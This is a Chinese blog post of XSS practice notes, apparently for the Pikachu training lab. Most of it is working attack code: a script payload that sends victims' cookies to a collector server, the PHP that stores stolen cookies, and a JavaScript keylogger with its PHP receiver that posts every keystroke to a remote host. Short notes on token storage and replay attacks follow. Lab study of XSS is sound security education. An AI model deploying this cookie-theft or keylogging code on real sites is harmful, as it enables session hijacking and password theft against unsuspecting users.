xss练习

已于 2022-06-07 11:25:10 修改
阅读量103 收藏
点赞数
分类专栏: 安全 文章标签: xss web安全 前端
于 2022-06-07 11:24:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kangwei_liu/article/details/105083475
版权
  • 获取cookie的注入
<script>document.location = 'http://192.168.208.145/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

cookie.php 代码

<?php
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();

//这个是获取cookie的api页面

```bash
if(isset($_GET['cookie'])){
    $time=date('Y-m-d g:i:s');
    $ipaddress=getenv ('REMOTE_ADDR');
    $cookie=$_GET['cookie'];
    $referer=$_SERVER['HTTP_REFERER'];
    $useragent=$_SERVER['HTTP_USER_AGENT'];
    $query="insert cookies(time,ipaddress,cookie,referer,useragent) 
    values('$time','$ipaddress','$cookie','$referer','$useragent')";
    $result=mysqli_query($link, $query);
}
header("Location:http://192.168.1.4/pikachu/index.php");//重定向到一个可信的网站
?>
  • 键盘记录的注入
<script src="http://192.168.208.146/pkxss/rkeypress/rk.js"></script>

rk.js代码

/**
 * Created by runner on 2018/7/8.
 */

function createAjax(){
    var request=false;
    if(window.XMLHttpRequest){
        request=new XMLHttpRequest();
        if(request.overrideMimeType){
            request.overrideMimeType("text/xml");
        }

    }else if(window.ActiveXObject){

        var versions=['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
        for(var i=0; i<versions.length; i++){
            try{
                request=new ActiveXObject(versions[i]);
                if(request){
                    return request;
                }
            }catch(e){
                request=false;
            }
        }
    }
    return request;
}

var ajax=null;
var xl="datax=";

function onkeypress() {
    var realkey = String.fromCharCode(event.keyCode);
    xl+=realkey;
    show();
}

document.onkeypress = onkeypress;

function show() {
    ajax = createAjax();
    ajax.onreadystatechange = function () {
        if (ajax.readyState == 4) {
            if (ajax.status == 200) {
                var data = ajax.responseText;
            } else {
                alert("页面请求失败");
            }
        }
    }

    var postdate = xl;
    ajax.open("POST", "http://192.168.1.15/pkxss/rkeypress/rkserver.php",true);
    ajax.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    ajax.setRequestHeader("Content-length", postdate.length);
    ajax.setRequestHeader("Connection", "close");
    ajax.send(postdate);
}

rkserver.php代码

<?php
/**
 * Created by runner.han
 * There is nothing new under the sun
 */

include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();

//设置允许被跨域访问
header("Access-Control-Allow-Origin:*");

$data = $_POST['datax'];
$query = "insert keypress(data) values('$data')";
$result=mysqli_query($link,$query);


?>

2020年3月25号
LocalStorage:
便利性:无法泛域储存,需开发者手动存取
使用方式:只能由 js 取出,加入特定请求头
安全性:避免了 csrf,但存在 xss 风险

httponly cookie:
便利性:可泛域储存,无需开发者手动存取
使用方式:只能遵循浏览器默认行为,js 无法获取 token
安全性:避免了 xss,但存在 csrf 风险

cookie:
便利性:可泛域储存,提供多种使用选择,比较复杂
使用方式:
可遵循浏览器行为,服务端也只需要验证 cookie
可用 js 取出,放入特定请求头;服务端验证特定请求头
安全性:
遵循浏览器默认行为,则同时存在 xss 和 csrf 风险
使用 js 取出,使用请求头认证,可避免 csrf,但同样存在 xss 风险

2020/3/26
重发攻击

  • 原理编辑
    重放攻击的基本原理就是把以前窃听到的数据原封不动地重新发送给接收方。很多时候,网络上传输的数据是加密过的,此时窃听者无法得到数据的准确意义。但如果他知道这些数据的作用,就可以在不知道数据内容的情况下通过再次发送这些数据达到愚弄接收端的目的。例如,有的系统会将鉴别信息进行简单加密后进行传输,这时攻击者虽然无法窃听密码,但他们却可以首先截取加密后的口令然后将其重放,从而利用这种方式进行有效的攻击。再比如,假设网上存款系统中,一条消息表示用户支取了一笔存款,攻击者完全可以多次发送这条消息而偷窃存款。 [2]
Conwy2022
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS练习平台【XSS Challenges】
taozijun的博客
07-31 1万+
以下来自XSS练习平台----XSS Challenges 这个练习平台没有像alert(1)to win类似的平台一样会给出关键的源代码,并且会在页面给予反馈。这是一个模仿真实xss挖洞的情景,在XSS Challenges练习过程中,我们需要用浏览器中的f12中搜索(),找出我们控制的代码所在的位置,然后思考那些个位置哪个或哪几个位置可以被注入我们想要的代码,然后结合上下文进行各种脑洞绕过。...
XSS练习平台
07-17
XSS练习平台、XSS练习平台XSS练习平台XSS练习平台XSS练习平台XSS练习平台
Xss小游戏通关攻略带解释
sirius的博客
08-28 5391
Xss小游戏通关攻略 实验环境:xss小游戏源码+phpstudy 源码地址:https://files.cnblogs.com/files/Eleven-Liu/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 实验步骤:启动phpstudy,浏览器访问127.0.0.1/xss/后提示点击图片进入第一关。 第一关:输入的变量直接被输出,直接构造payload即可。 http://127.0.0.1/xss/level1.php?.
Web文件包含/上传/下载漏洞-pikachu靶场
qq_43936524的博客
10-16 463
文章目录文件包含漏洞文件包含漏洞概述文件包含函数实例本地文件包含漏洞远程文件包含漏洞文件下载漏洞文件下载漏洞概述实例文件上传漏洞文件上传漏洞概述文件上传漏洞测试流程 文件包含漏洞 文件包含漏洞概述 在web后台开发中,程序员往往为了提高效率以及让代码看起来更加简洁,会使用“包含”函数功能。 比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include fuction.php?>就可以调用函数代码。 但有些时候,因为网站功能需求
XSS练习
lwbcsd的博客
03-26 4617
XSS ctfhub 反射型xss 做了第二遍,还是看了wp之后才看懂,发现自己还是太菜了,完全没思路 这里看下理解之后的解题过程 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KWV86jeQ-1648285193536)(C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20220323220334331.png)] 打开之后,是这样的一个网站,已经知道是XSS了,第一步先输出js代码看能不能执行
xss靶场练习
qq_46804551的博客
11-02 227
- Pass-1 127.0.0.1/xss/level1.php?name=<script>alert(1)</script> 通过 - Pass-2 直接插入不行,引号将其包裹起了 http://127.0.0.1/xss/level2.php?keyword="><script>alert(1)</script><-- - Pass-3 审查元素看看 看似和2没啥区别 但与level2不同的是,value做了校验,双引号和尖括号都
xss练习笔记
mmzkyl的博客
12-30 1198
写篇博客主要记录一下xss的学习 此次使用的网站是:xss练习 进入网站首页后,点击图片便能开始xss的学习之旅了 文章目录Level-1Level-2Level-3Level-4Level-5Level-6Level-7Level-8Level-9Level-10Level-11Level-12Level-13Level-14Level-15Level-16 Level-1 可以看到Level-1的界面,这一关的xss注入点比较明显,就是在url栏中参数:name payload: <scri.
在线XSS练习
失心疯的博客
06-26 1740
在线XSS练习 目录 环境 参考 环境 xss.tv firefox 参考 xss挑战平台练习 xss tv 挑战笔记
xss练习记录
JDWDXN的博客
10-12 353
level2 构造闭合绕过 校验代码 <?php ini_set("display_errors", 0); $str = $_GET["keyword"]; echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center> <form action=level2.php method=GET> <input name=keyword value="'.$s
XSS20关练习源码
09-04
包含20关XSS练习的源码。文件都为PHP类型,下载个phpstudy就可以搭建起来了。我已经通过了,所以共享出来给大家练习
xss+csrf+html练习源码.rar_XSS_csrf_csrf源码_xss源码_xss练习源码
09-20
xss反射存储型的+csrf+html注入老网站的练习源码
xss平台搭建源码,xss漏洞练习
06-03
xss平台搭建源码,用于练习xss漏洞,适用于网络安全学科的爱好者和学生,下载后解压缩到www目录下,需要将xss-sql导入数据库,并更改一下源码部分内容,很容易。最后要配置伪静态文件。
xss_test.7z
03-12
xss_test.7z
XSS & CSRF 】访问时篡改密码——以DVWA-High为例
Mr_Fmnwon的博客
05-23 546
第二阶段,增加了一个CSRF-Token。关于XSS的利用,cookie的泄露,在上述博客中已很清晰地说明白了~从一开始无法利用,到思考需要的条件,一步步实现,对CSRF、XSS的理解更深了。唯一觉得遗憾的是,chat强大、解放编写代码门槛的同时,也让我编码能力——程序员的核心能力——迟滞不前甚至降低许多。。。唉。
XSS实战漏洞挖掘
hmysn的博客
05-11 664
接下来一年时间将会主要研究渗透测试方向的众多问题,文章中的内容也会在后面定期更新。本文主要记录了一些XSS漏洞挖掘中的实用心得和学习笔记。
XSS & CSRF 】泄露cookie——以DVWA-High为例
Mr_Fmnwon的博客
05-23 846
综合利用XSS以及CSRF实现Cookie的泄露,,,旅程比较曲折跨站脚本攻击XSS(最全最细致的靶场实战)_xss靶场-CSDN博客网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。
面对网络安全隐患该如何去做呢?
m0_73514785的博客
05-23 321
由于主动式集线器与交换机不通过广播方式进行数据包的转发,嗅探技术也只针对共享式的网络起作用,因此,可以通过交换机的使用,对网络进行分段,最大程度地防止网络技术地攻击,即使受到嗅探技术地入侵,也只能攻击到一部分的信息流。其实伪基站不会连接到运营商的真实网络,它只是自动测量出其所在区域运营商基站所用的广播控制信道频点,然后将测量到的频点和短信内容输入到伪基站的操作平台上,批量群发短信,并且可以在接收方的短信上任意编造主叫号码。开启这些防护设备的网络,可实现对网络层的访问控制,是上网安全的重要保障。
网络安全相关面试题(hw)
最新发布
XLbb的博客
05-23 615
7、敏感信息收集,如 github 源码、用 7kb、破壳扫源代码泄露(.hg、.git、cvs、svn、.DS_store 源代码泄露)、google hack、接口信息泄露、社工信息泄露、邮箱地址信息收集、网盘搜索、钟馗之眼、天眼查、威胁情报、微步在线等。3、可以使用 D 盾_web 查杀工具、火绒剑、 XueTr 等工具进行判 断可疑进程(如蓝色、红色进程、没有签名验证信息的进程、没有 描述信息的进程、进程的属主、进程的路径是否合法、 CPU 或内存资源占用长时间过高的进程)
反射型 xss靶场练习
09-27
在反射型XSS靶场练习中,可以使用以下步骤来进行练习: 1. 首先,找到一个含有反射型XSS漏洞的目标网站。 2. 在目标网站的输入框或URL参数中插入恶意代码,例如<script>alert("XSS")。 3. 提交输入或发送包含恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值